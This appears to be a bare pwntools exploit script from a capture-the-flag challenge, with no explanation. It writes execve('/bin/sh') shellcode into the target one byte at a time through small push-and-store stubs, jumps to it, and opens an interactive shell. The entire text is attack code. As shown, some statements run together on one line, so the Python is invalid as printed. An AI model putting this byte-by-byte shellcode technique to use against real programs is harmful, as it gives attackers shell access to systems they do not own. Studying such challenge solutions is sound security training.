from tools import * p,e,libc= load("a")
context.arch='amd64' context.log_level='debug' p.sendlineafter("will you continue?(enter 'n' to quit) :",'d')
p.sendafter('start!!!!',b'\x6A\x48\x8F\x42\x20\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x31\x58\x48\x89\x42\x21\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x68\xC0\x00\x00\x00\x8F\x42\x22\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x6A\x8F\x42\x23\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x3B\x8F\x42\x24\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x58\x8F\x42\x25\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x48\x8F\x42\x26\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x31\x8F\x42\x27\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x68\xFF\x00\x00\x00\x8F\x42\x28\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x48\x8F\x42\x29\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x68\xBF\x00\x00\x00\x8F\x42\x2A\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x2F\x8F\x42\x2B\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x62\x8F\x42\x2C\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x69\x8F\x42\x2D\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x6E\x8F\x42\x2E\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x2F\x8F\x42\x2F\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x73\x8F\x42\x30\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x68\x8F\x42\x31\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x00\x8F\x42\x32\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x57\x8F\x42\x33\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x54\x8F\x42\x34\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x5F\x8F\x42\x35\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x48\x8F\x42\x36\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x31\x8F\x42\x37\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x68\xF6\x00\x00\x00\x8F\x42\x38\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x48\x8F\x42\x39\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x31\x8F\x42\x3A\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x68\xD2\x00\x00\x00\x8F\x42\x3B\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x0F\x8F\x42\x3C\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x6A\x05\x8F\x42\x3D\xC3')
p.sendlineafter("will you continue?(enter 'n' to quit) :",'d') p.sendafter('start!!!!',b'\x48\x83\xC2\x20\xFF\xE2') p.interactive()
|